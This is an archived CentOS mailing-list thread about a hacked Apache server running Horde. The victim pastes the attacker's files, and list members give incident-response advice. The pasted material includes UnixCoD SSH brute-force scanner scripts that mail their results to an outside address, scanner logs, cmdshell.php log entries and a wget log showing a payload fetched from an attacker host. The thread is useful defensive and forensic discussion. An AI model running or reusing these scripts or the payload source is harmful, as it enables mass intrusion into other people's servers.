BRUCE U ARE A F******* GENIUS MAN !!!!!
u were right bro....thanx for spending the time on this man....
more info below !!!!!!!!!!!!!
----- Original Message ----
From: bruce bedouglas@earthlink.net To: linuxhousedn@yahoo.com Sent: Wednesday, June 3, 2009 9:53:24 PM Subject: RE: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
hi...
i've seen a few of your threads on your issue of the 'atack' processes running from your web server...
i'm replying to you offline, as ......
take a look over your box, and let's see what you have...
as per yr tip i had found a file called atack under this folder /dev/shm/unix .... even though i could not locate such a file before..... i have now removed that file and am now probing the contents of the /dev/shm/unix folder.....
[root@fwgw unix]# pwd /dev/shm/unix
[root@fwgw unix]# ls -al total 4352 drwxr-xr-x 2 apache apache 360 Jun 3 23:47 . drwxrwxrwt 3 root root 60 Jun 3 00:24 .. -rwxr-xr-x 1 apache apache 0 May 19 06:02 124.164.find.22 -rwxr-xr-x 1 apache apache 0 Mar 24 22:28 129.135.find.22 -rwxr-xr-x 1 apache apache 0 Mar 24 22:25 129.find.22 -rwxr-xr-x 1 apache apache 0 May 25 13:54 21.168.find.22 -rwxr-xr-x 1 apache apache 12687 May 25 06:16 60.191.find.22 -rw-r--r-- 1 apache apache 0 Jun 3 23:45 83.182.find.22 -rwxr-xr-x 1 apache apache 4631 Apr 21 17:50 84.2.find.22 -rwxr-xr-x 1 apache apache 0 May 25 06:17 89.38.find.22 -rwxr-xr-x 1 apache apache 2362 May 19 15:28 91.204.find.22 -rwxr-xr-x 1 apache apache 216 May 18 2005 auto -rwxr-xr-x 1 apache apache 4374933 May 15 19:41 data.conf -rwxr-xr-x 1 apache apache 15729 Oct 14 2005 find -rw-r--r-- 1 apache apache 5262 Jun 3 23:45 log -rwxr-xr-x 1 apache apache 751 May 25 06:33 unix -rw-r--r-- 1 apache apache 0 Jun 3 23:04 vuln.txt -rwxr-xr-x 1 apache apache 671 May 25 13:56 x
The contents of file 'x' are;
#!/bin/bash echo "[+] PLM prea destept pentru voi : Yuli [+]" X=0 c=0 while [ $X -le 255 ] do c=$RANDOM let "c %= 255" echo "[+] Scanam radom class b $1.$c [+]" ./find $1.$c 22 sleep 10 cat $1.$c.find.22 |sort |uniq > ip.conf oopsnr2=`grep -c . ip.conf` echo "[+] Incepe partea cea mai misto :D" echo "[+] Doar $oopsnr2 de servere. Exista un inceput pt. toate !" echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]" echo "[+] Incepem sa vedem cate server putem sparge" ./atack 100 >> log mail -s $1.$c yuli1989xxx@yahoo.com < log rm -rf $1.$c.find.22 ip.conf echo "[+] Scanner a terminat de scanat !" echo "[+] Next random class b !" X=$((X+1))
the contents of the file 'unix' are;
#!/bin/bash if [ $# != 1 ]; then echo "[+] Folosim : $0 [b class]" exit; fi
echo "[+][+][+][+][+] UnixCoD Atack Scanner [+][+][+][+][+]" echo "[+] SSH Brute force scanner : user & password [+]" echo "[+] Undernet Channel : #yuli [+]" echo "[+][+][+][+][+][+][+] ver 0x10 [+][+][+][+][+][+][+]" ./find $1 22
sleep 10 cat $1.find.22 |sort |uniq > ip.conf oopsnr2=`grep -c . ip.conf` echo "[+] Incepe partea cea mai misto :D" echo "[+] Doar $oopsnr2 de servere. Exista un inceput pt. toate !" echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]" echo "[+] Incepem sa vedem cate server putem sparge" ./atack 100 rm -rf $1.find.22 ip.conf echo "[+] UnixCoD Scanner a terminat de scanat !"
the contents of 'auto' are;
#!/bin/sh echo echo "Enter A class range" read brange echo "Enter output file" read file crange=0 while [ $crange -lt 255 ] ; do echo -n "./assh $brange.$crange ; " >> $file let crange=crange+1 done
the contents of 'log' are;
[+] No SSH ->www:www:83.246.113.34 [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] No SSH ->www:www:83.246.119.41 [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
Further googling indicates that UnixCod is a brute force ssh scanner... what is is odd is that i have fail2ban ruunning ( which blocks IPs after 2 failed attempts) and a 8 letter passwd but i still got hacked....
Guys...any comments....
AND ONCE AGAIN THANKS BRUCE !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Regards, Marco.
so you're going to need to figure out what the hole in your system is/was... you're going to need to patch it... you're going to need to examine the logs for logins to your other systems.. as well as examine the ssh logs for outgoing login attempts from the hacked box to other boxes in your network...
if the other boxes in your network have webservers that are exposed to the net, you're going to have to examins them as well...
you're going to have to check for other files (/dev/shm.. etc..) on the other boxes...
but in all probablity, you should reinstall on the initial box, once you've resolved how to correct the issue... (this includes analyzing the webserver apps!!!!!!!)
good luck!
-----Original Message----- From: Linux Advocate [mailto:linuxhousedn@yahoo.com] Sent: Wednesday, June 03, 2009 9:33 AM To: bruce Cc: CentOS mailing list Subject: Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
BRUCE U ARE A F******* GENIUS MAN !!!!!
u were right bro....thanx for spending the time on this man....
more info below !!!!!!!!!!!!!
----- Original Message ----
From: bruce bedouglas@earthlink.net To: linuxhousedn@yahoo.com Sent: Wednesday, June 3, 2009 9:53:24 PM Subject: RE: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
hi...
i've seen a few of your threads on your issue of the 'atack' processes running from your web server...
i'm replying to you offline, as ......
take a look over your box, and let's see what you have...
as per yr tip i had found a file called atack under this folder /dev/shm/unix .... even though i could not locate such a file before..... i have now removed that file and am now probing the contents of the /dev/shm/unix folder.....
[root@fwgw unix]# pwd /dev/shm/unix
[root@fwgw unix]# ls -al total 4352 drwxr-xr-x 2 apache apache 360 Jun 3 23:47 . drwxrwxrwt 3 root root 60 Jun 3 00:24 .. -rwxr-xr-x 1 apache apache 0 May 19 06:02 124.164.find.22 -rwxr-xr-x 1 apache apache 0 Mar 24 22:28 129.135.find.22 -rwxr-xr-x 1 apache apache 0 Mar 24 22:25 129.find.22 -rwxr-xr-x 1 apache apache 0 May 25 13:54 21.168.find.22 -rwxr-xr-x 1 apache apache 12687 May 25 06:16 60.191.find.22 -rw-r--r-- 1 apache apache 0 Jun 3 23:45 83.182.find.22 -rwxr-xr-x 1 apache apache 4631 Apr 21 17:50 84.2.find.22 -rwxr-xr-x 1 apache apache 0 May 25 06:17 89.38.find.22 -rwxr-xr-x 1 apache apache 2362 May 19 15:28 91.204.find.22 -rwxr-xr-x 1 apache apache 216 May 18 2005 auto -rwxr-xr-x 1 apache apache 4374933 May 15 19:41 data.conf -rwxr-xr-x 1 apache apache 15729 Oct 14 2005 find -rw-r--r-- 1 apache apache 5262 Jun 3 23:45 log -rwxr-xr-x 1 apache apache 751 May 25 06:33 unix -rw-r--r-- 1 apache apache 0 Jun 3 23:04 vuln.txt -rwxr-xr-x 1 apache apache 671 May 25 13:56 x
The contents of file 'x' are;
#!/bin/bash echo "[+] PLM prea destept pentru voi : Yuli [+]" X=0 c=0 while [ $X -le 255 ] do c=$RANDOM let "c %= 255" echo "[+] Scanam radom class b $1.$c [+]" ./find $1.$c 22 sleep 10 cat $1.$c.find.22 |sort |uniq > ip.conf oopsnr2=`grep -c . ip.conf` echo "[+] Incepe partea cea mai misto :D" echo "[+] Doar $oopsnr2 de servere. Exista un inceput pt. toate !" echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]" echo "[+] Incepem sa vedem cate server putem sparge" ./atack 100 >> log mail -s $1.$c yuli1989xxx@yahoo.com < log rm -rf $1.$c.find.22 ip.conf echo "[+] Scanner a terminat de scanat !" echo "[+] Next random class b !" X=$((X+1))
the contents of the file 'unix' are;
#!/bin/bash if [ $# != 1 ]; then echo "[+] Folosim : $0 [b class]" exit; fi
echo "[+][+][+][+][+] UnixCoD Atack Scanner [+][+][+][+][+]" echo "[+] SSH Brute force scanner : user & password [+]" echo "[+] Undernet Channel : #yuli [+]" echo "[+][+][+][+][+][+][+] ver 0x10 [+][+][+][+][+][+][+]" ./find $1 22
sleep 10 cat $1.find.22 |sort |uniq > ip.conf oopsnr2=`grep -c . ip.conf` echo "[+] Incepe partea cea mai misto :D" echo "[+] Doar $oopsnr2 de servere. Exista un inceput pt. toate !" echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]" echo "[+] Incepem sa vedem cate server putem sparge" ./atack 100 rm -rf $1.find.22 ip.conf echo "[+] UnixCoD Scanner a terminat de scanat !"
the contents of 'auto' are;
#!/bin/sh echo echo "Enter A class range" read brange echo "Enter output file" read file crange=0 while [ $crange -lt 255 ] ; do echo -n "./assh $brange.$crange ; " >> $file let crange=crange+1 done
the contents of 'log' are;
[+] No SSH ->www:www:83.246.113.34 [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] No SSH ->www:www:83.246.119.41 [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ] [+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
Further googling indicates that UnixCod is a brute force ssh scanner... what is is odd is that i have fail2ban ruunning ( which blocks IPs after 2 failed attempts) and a 8 letter passwd but i still got hacked....
Guys...any comments....
AND ONCE AGAIN THANKS BRUCE !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !
Regards, Marco.
On Wed, 2009-06-03 at 09:33 -0700, Linux Advocate wrote:
<snip>
[root@fwgw unix]# pwd /dev/shm/unix
<snip>
Note that /dev/shm is a tempfs file system. It will be dynamically populated. I would expect the attack vector still resides on your system somewhere else.
----- Original Message ----
From: William L. Maltby CentOS4Bill@triad.rr.com To: CentOS mailing list centos@centos.org Sent: Thursday, June 4, 2009 12:56:22 AM Subject: Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
On Wed, 2009-06-03 at 09:33 -0700, Linux Advocate wrote:
[root@fwgw unix]# pwd /dev/shm/unix
Note that /dev/shm is a tempfs file system. It will be dynamically populated. I would expect the attack vector still resides on your system somewhere else.
i m looking for it bro...the machine is disconnected frm the net but i have not formatted it yet... i really need to know how it happened....
Hi,
On Sat, Jun 13, 2009 at 03:19, Linux Advocatelinuxhousedn@yahoo.com wrote:
i'm looking for it bro...the machine is disconnected frm the net but i have not formatted it yet... i really need to know how it happened....
I suggest you start by looking at Apache's logs, look for very strange URLs hat have nothing to do with the applications you have there, like .exe files (IIS attacks) or other .cgi or .php files that will give you 404 errors. Also look for things in the error_log file. And then look for other accesses from the same IP (assuming it's always from the same IP) to files that do exist, this will probably lead you to what was used to break in. Continue the investigation from there.
Also, you can use "stat /dev/shm/unix" to find the "ctime" of that directory, or look into the modification time of "/dev/shm" to try to figure out when "/dev/shm/unix" directory was created, then you can look for accesses at that time in your Apache logs to figure out which script was used for the break in.
Usually script kiddies will run a series of attacks on your machine, which will generate logs with errors. Unless the attacker got root access (which apparently he did not, as he was running his program as user apache) he would not be able to delete logs, so the evidence should still be there.
HTH, Filipe
replies below...
----- Original Message ----
From: Filipe Brandenburger filbranden@gmail.com To: CentOS mailing list centos@centos.org Sent: Saturday, June 13, 2009 9:58:51 PM Subject: Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
I suggest you start by looking at Apache's logs,
Filipe, good idea. will do.
look for very strange URLs hat have nothing to do with the applications you have there, like .exe files (IIS attacks) or other .cgi or .php files that will give you 404 errors. Also look for things in the error_log file. And then look for other accesses from the same IP (assuming it's always from the same IP) to files that do exist, this will probably lead you to what was used to break in. Continue the investigation from there.
A. I have found susicious ip around the dates ( based on the dates of files in the atack folder) when i think this break-in could hv hapened
86.126.71.74 <--- frm romania ( i am in singapore )
This ip seemed to have generated the most error messages. they are other not-frm-country IPs but way way less errors frm them.
They are many error messages (generated by 86.126.71.74) in the apache error log as below;
[Mon May 18 05:39:39 2009] [error] [client 86.126.71.74] PHP Warning: Cannot modify header information - headers already sent in Unknown on line 0, referer: http://ip.of.machine.i.removed.for.this.post/horde/admin/cmdshell.php ./x: line 19: log: No such file or directory
[Tue May 19 02:27:32 2009] [error] [client 86.126.71.74] PHP Warning: Cannot modify header information - headers already sent in Unknown on line 0, referer: http://60.54.174.146/horde/admin/cmdshell.php?Horde=e20jlll1ds0eudvsdqrsrbb7...
[Thu May 21 19:29:52 2009] [error] [client 80.179.16.201] script '/var/www/html/sys_to_server.php' not found or unable to stat
http://60.54.174.146/horde/admin/cmdshell.php?Horde=f49bd7r2sb0ut885k3t5vq0n... cat: vuln.txt: No such file or directory
<--- this vuln.txt is in the /dev/shm/unix/atack folder and also in the /var/tmp/unix/atack folder. Was the atacker looking for this file and then plant it later? or something like that ?
[Wed May 27 12:20:28 2009] [error] [client 86.126.71.74] PHP Warning: Cannot modify header information - headers already sent in Unknown on line 0, referer: http://60.54.174.146/horde/admin/cmdshell.php Len 255 < 256 Len 255 < 256 Len 255 < 256 Len 255 < 256 Len 255 < 256 Len 255 < 256 Len 255 < 256 Len 255 < 256 Len 255 < 256 Len 255 < 256 Len 255 < 256 Len 255 < 256 Len 255 < 256 Len 255 < 256 Len 255 < 256 Len 255 < 256 Len 255 < 256 Len 255 < 256 Len 255 < 256
What does Len 255 < 256 indicate? Some kind of buffer overflow?
B .Can i conclude that the attacker came through the horde framework ( cmdshell.php) ? The horde framework was installed from the centos repo.....!!!
[root@fwg]# yum info horde
Name : horde Arch : noarch Version : 3.1.7 Release : 1.el5.centos Size : 18 M Repo : installed Summary : The common Horde Framework for all Horde modules. URL : http://www.horde.org/
There are some google hits on cmdshell.php being used to execute arbitrary commands? There is some exploit called "CmdShell.Horde.ExploitCheck.Decoy" i havent found more info yet. Any tips on this would be most welcome.
There is also this line in the error log;
[Fri May 22 18:26:56 2009] [notice] SELinux policy enabled; httpd running as context system_u:system_r:httpd_t
Is the line above normal?
C. BUT THE WORST THING OF ALL IS THESE LINES BELOW....
Mon May 25 14:46:50 2009] [error] [client 86.126.71.74] PHP Warning: Cannot modify header information - headers already sent in Unknown on line 0, referer: http://my.machine.ip.again/horde/admin/cmdshell.php?Horde=7blkurngfdeqsgorrk... --14:47:00-- http://mv.do.am/unix.tgz Rezolvare mv.do.am... 208.100.61.101 Connecting to mv.do.am|208.100.61.101|:80... conectat. Cerere HTTP trimisă, se aşteaptă răspuns... 200 OK Dimensiune: 1614224 (1,5M) [application/octet-stream] Saving to: `unix.tgz'
0K .......... .......... .......... .......... .......... 3% 17,6K 87s 50K .......... .......... .......... .......... .......... 6% 33,7K 64s 100K .......... .......... .......... .......... .......... 9% 33,5K 55s 150K .......... .......... .......... .......... .......... 12% 45,6K 48s 200K .......... .......... .......... .......... .......... 15% 52,8K 42s 250K .......... .......... .......... .......... .......... 19% 50,3K 38s 300K .......... .......... .......... .......... .......... 22% 47,9K 35s 350K .......... .......... .......... .......... .......... 25% 54,8K 32s 400K .......... .......... .......... .......... .......... 28% 48,7K 30s 450K .......... .......... .......... .......... .......... 31% 36,9K 28s 500K .......... .......... .......... .......... .......... 34% 34,6K 27s 550K .......... .......... .......... .......... .......... 38% 32,9K 26s 600K .......... .......... .......... .......... .......... 41% 28,4K 26s 650K .......... .......... .......... .......... .......... 44% 36,7K 24s 700K .......... .......... .......... .......... .......... 47% 34,3K 23s 750K .......... .......... .......... .......... .......... 50% 34,0K 22s 800K .......... .......... .......... .......... .......... 53% 33,1K 20s 850K .......... .......... .......... .......... .......... 57% 47,7K 19s 900K .......... .......... .......... .......... .......... 60% 27,4K 18s 950K .......... .......... .......... .......... .......... 63% 13,0K 18s 1000K .......... .......... .......... .......... .......... 66% 28,3K 16s 1050K .......... .......... .......... .......... .......... 69% 38,1K 15s 1100K .......... .......... .......... .......... .......... 72% 29,3K 13s 1150K .......... .......... .......... .......... .......... 76% 44,1K 11s 1200K .......... .......... .......... .......... .......... 79% 56,6K 10s 1250K .......... .......... .......... .......... .......... 82% 44,7K 8s 1300K .......... .......... .......... .......... .......... 85% 39,8K 7s 1350K .......... .......... .......... .......... .......... 88% 50,8K 5s 1400K .......... .......... .......... .......... .......... 91% 40,2K 4s 1450K .......... .......... .......... .......... .......... 95% 37,3K 2s 1500K .......... .......... .......... .......... .......... 98% 43,1K 1s 1550K .......... .......... ...... 100% 44,5K=45s
14:47:47 (35,1 KB/s) - `unix.tgz' saved [1614224/1614224]
DID THIS GUY ACTUALLY SAVE A FILE ON MY HARD DISK??? AAAAAAHHHHHHHHHHHHHHHHHHHH???????????????
Was this why rkhunter popped out with this warning?
* Filesystem checks Checking /dev for suspicious files... [ OK ] Scanning for hidden files... [ Warning! ] --------------- /etc/.pwd.lock /usr/share/man/man1/..1.gz /dev/.udev --------------- Please inspect: /usr/share/man/man1/..1.gz (gzip compressed data, from Unix, max compression) /dev/.udev (directory)
Should i delete these files? are the man files nromally .gz or .bz2 ?
There is also a similar entry, where another file called unix2.tgz was downloaded....
But i cant find these files on the HDisk? guys i am out of my league here. All assistance is deeply appreciated.
HTH, Filipe _______________________________________________ CentOS mailing list CentOS@centos.org http://lists.centos.org/mailman/listinfo/centos
Linux Advocate wrote:
DID THIS GUY ACTUALLY SAVE A FILE ON MY HARD DISK??? AAAAAAHHHHHHHHHHHHHHHHHHHH???????????????
Was this why rkhunter popped out with this warning?
- Filesystem checks Checking /dev for suspicious files... [ OK ] Scanning for hidden files... [ Warning! ]
/etc/.pwd.lock /usr/share/man/man1/..1.gz /dev/.udev
Please inspect: /usr/share/man/man1/..1.gz (gzip compressed data, from Unix, max compression) /dev/.udev (directory)
Should i delete these files? are the man files nromally .gz or .bz2 ?
There is also a similar entry, where another file called unix2.tgz was downloaded....
But i cant find these files on the HDisk? guys i am out of my league here. All assistance is deeply appreciated.
I *hope* this machine is disconnected from the internet and running a liveCD to investigate this
yes, it appears you've been hacked, and have stealth files (any file with . in front oft he name is hidden and would only show with ls -a and if you *are* rootkitted, there's a strong possibility your ls and other command tools have been replaced..
and, it appears it came in via an exploit in that horde framework (I know nothing about horde)
john, replies below...
Linux Advocate wrote:
DID THIS GUY ACTUALLY SAVE A FILE ON MY HARD DISK??? AAAAAAHHHHHHHHHHHHHHHHHHHH???????????????
Was this why rkhunter popped out with this warning?
- Filesystem checks Checking /dev for suspicious files... [ OK ] Scanning for hidden files... [ Warning! ]
/etc/.pwd.lock /usr/share/man/man1/..1.gz /dev/.udev
Please inspect: /usr/share/man/man1/..1.gz (gzip compressed data, from Unix,
max compression) /dev/.udev (directory)
Should i delete these files? are the man files nromally .gz or .bz2 ?
There is also a similar entry, where another file called unix2.tgz was
downloaded....
But i cant find these files on the HDisk? guys i am out of my league here. All assistance is deeply appreciated.
I *hope* this machine is disconnected from the internet and running a liveCD to investigate this
yes. but i havent formatted it yet bcos i need to understand what happened... i still cant believe a centos box that was regularly updated , patched was hacked
yes, it appears you've been hacked, and have stealth files (any file with . in front oft he name is hidden and would only show with ls -a and if you *are* rootkitted, there's a strong possibility your ls and other command tools have been replaced..
i dont think the attacker got root ownership or else the log files would have been altered or deleted.
and, it appears it came in via an exploit in that horde framework (I know nothing about horde)
hopefully more members on the list will weigh in on this.
Linux Advocate wrote:
/etc/.pwd.lock /usr/share/man/man1/..1.gz /dev/.udev
Please inspect: /usr/share/man/man1/..1.gz (gzip compressed data, from Unix,
max compression) /dev/.udev (directory)
actually, I just checked on another system, those files appear to be normal
google for horde exploits, and you will see there are some that look very much like those apache log entries you saw.
On 6/14/09, Linux Advocate linuxhousedn@yahoo.com wrote: <snip>
yes. but i havent formatted it yet bcos i need to understand what happened... i still cant believe a centos box that was regularly updated , patched was hacked
In addition to the regular updates you make to the box, there are things you can do, to "harden" the security. That will make it tougher for someone to hack. You can begin with the manual you can download from nsa.gov or other documentation. However, please do not believe that you can make the box impossible to hack. A hardened box will discourage the majority of hackers and they will go elsewhere. GL
B .Can i conclude that the attacker came through the horde framework ( cmdshell.php) ? The horde framework was installed from the centos repo.....!!!
C. BUT THE WORST THING OF ALL IS THESE LINES BELOW....
<snip>
14:47:47 (35,1 KB/s) - `unix.tgz' saved [1614224/1614224]
To answer B & C, I'm reasonably certain that the answer to both is Yes. I got curious so I downloaded the file at: http://mv.do.am/unix.tgz into a secured area of my computer. I was surprised the hacker hasn't moved on but it contains the files you identified sitting in /dev/shm/unix.
It looks to me like the hacker exploited a weakness in horde's cmdshell.php to upload the file "unix.tgz" to /dev/shm, then unpacked it and off he/she went.
Going forward I would recommend, after doing a wipe & reinstall, investigate putting Apache into a chroot jail and hardening php using suhosin/hardened-php or the like. The jail will will limit the damage a hacker can do when they break in, and Suhosin will make it harder for them to do so.
<snip>
B .Can i conclude that the attacker came through the horde framework ( cmdshell.php) ? The horde framework was installed from the centos repo.....!!!
I don't think the horde set on CentOS is very current. I just used the tarball from the horde website, and I keep it current.
cmdshell.php)
? The horde framework was installed from the centos repo.....!!!
I don't think the horde set on CentOS is very current. I just used the tarball from the horde website, and I keep it current.
ok. its just that with centos being a redhat clone and so on. all the rpms they use are suppose to hv been 'vetted' right.... but anywat... its a lesson learnt.
Linux Advocate wrote:
cmdshell.php)
? The horde framework was installed from the centos repo.....!!!
I don't think the horde set on CentOS is very current. I just used the tarball from the horde website, and I keep it current.
ok. its just that with centos being a redhat clone and so on. all the rpms they use are suppose to hv been 'vetted' right.... but anywat... its a lesson learnt.
Security and bug fixes are backported to the RH/centos releases as they are found. But you have to run yum to apply them to your system as they are available because everyone knows the flaws as soon as they are published.
on 6-16-2009 10:26 PM Linux Advocate spake the following:
cmdshell.php)
? The horde framework was installed from the centos repo.....!!!
I don't think the horde set on CentOS is very current. I just used the tarball from the horde website, and I keep it current.
ok. its just that with centos being a redhat clone and so on. all the rpms they use are suppose to hv been 'vetted' right.... but anywat... its a lesson learnt.
I think the horde stuff is in extras or plus, and not maintained AFAIK.
thanx guys. Lets close this thread. bye.
----- Original Message ----
From: Scott Silva ssilva@sgvwater.com To: centos@centos.org Sent: Thursday, June 18, 2009 2:36:27 AM Subject: Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
on 6-16-2009 10:26 PM Linux Advocate spake the following:
cmdshell.php)
? The horde framework was installed from the centos repo.....!!!
I don't think the horde set on CentOS is very current. I just used the
tarball
from the horde website, and I keep it current.
ok. its just that with centos being a redhat clone and so on. all the rpms
they use are suppose to hv been 'vetted' right.... but anywat... its a lesson learnt.
I think the horde stuff is in extras or plus, and not maintained AFAIK.
On Sat, 2009-06-13 at 00:19 -0700, Linux Advocate wrote:
<snip> > > Note that /dev/shm is a tempfs file system. It will be dynamically > populated. I would expect the attack vector still resides on your system > somewhere else. >
i m looking for it bro...the machine is disconnected frm the net but i have not formatted it yet... i really need to know how it happened....
Have you run the rpm with the --verify? You'll need to get another option or two to get it to give more verbose information.
It occured to me too that find file not providfed by any package might give some clues (although most of what it may return will not be problems). If you get a list of all file (use find so even "hidden" ones appear) and then use rpm to find out --whatprovides you should get a bunch - some user and a few not user files. These become candidates for further inspection. There's always going to be a few that are not from a package but are OK.
Good luck on your detecting.
<snip sig stuff>
Further googling indicates that UnixCod is a brute force ssh scanner... what is is odd is that i have fail2ban ruunning ( which blocks IPs after 2 failed attempts) and a 8 letter passwd but i still got hacked....
Hi Marco,
Just because the app is an SSH scanner doesn't automatically mean they broke in through SSH.
As has been mentioned a few times the most likely vector of attack/compromise on your machine was through a app/script of some sort running on your website. Any of the app's you mentioned in an earlier post is suspect in this case.
the directory is user:group apache:apache... so check your apache logs.... go over your apache logs with a fine toothed comb. specifically look for: file timestamps that match files in the directory(May 25 13:56). POST requests, this will usually very quickly show you the requests and the web app hole. after finding the hole/IP, search your apache logs for all requests from that IP address.
once things have slowed down, be a good netizan and contact yahoo.com abuse to let them know about the collection email account.
ps: take a deep breath, it's not the end of the world.
Linux Advocate wrote:
[root@fwgw unix]# ls -al total 4352 drwxr-xr-x 2 apache apache 360 Jun 3 23:47 . drwxrwxrwt 3 root root 60 Jun 3 00:24 .. -rwxr-xr-x 1 apache apache 0 May 19 06:02 124.164.find.22 -rwxr-xr-x 1 apache apache 0 Mar 24 22:28 129.135.find.22 -rwxr-xr-x 1 apache apache 0 Mar 24 22:25 129.find.22 -rwxr-xr-x 1 apache apache 0 May 25 13:54 21.168.find.22 -rwxr-xr-x 1 apache apache 12687 May 25 06:16 60.191.find.22 -rw-r--r-- 1 apache apache 0 Jun 3 23:45 83.182.find.22 -rwxr-xr-x 1 apache apache 4631 Apr 21 17:50 84.2.find.22 -rwxr-xr-x 1 apache apache 0 May 25 06:17 89.38.find.22 -rwxr-xr-x 1 apache apache 2362 May 19 15:28 91.204.find.22 -rwxr-xr-x 1 apache apache 216 May 18 2005 auto -rwxr-xr-x 1 apache apache 4374933 May 15 19:41 data.conf -rwxr-xr-x 1 apache apache 15729 Oct 14 2005 find -rw-r--r-- 1 apache apache 5262 Jun 3 23:45 log -rwxr-xr-x 1 apache apache 751 May 25 06:33 unix -rw-r--r-- 1 apache apache 0 Jun 3 23:04 vuln.txt -rwxr-xr-x 1 apache apache 671 May 25 13:56 x
-
bruce -
Drew -
Filipe Brandenburger -
John R Pierce -
Lanny Marcus -
Les Mikesell -
Linux Advocate -
Scott Silva -
Steven Tardy -
William L. Maltby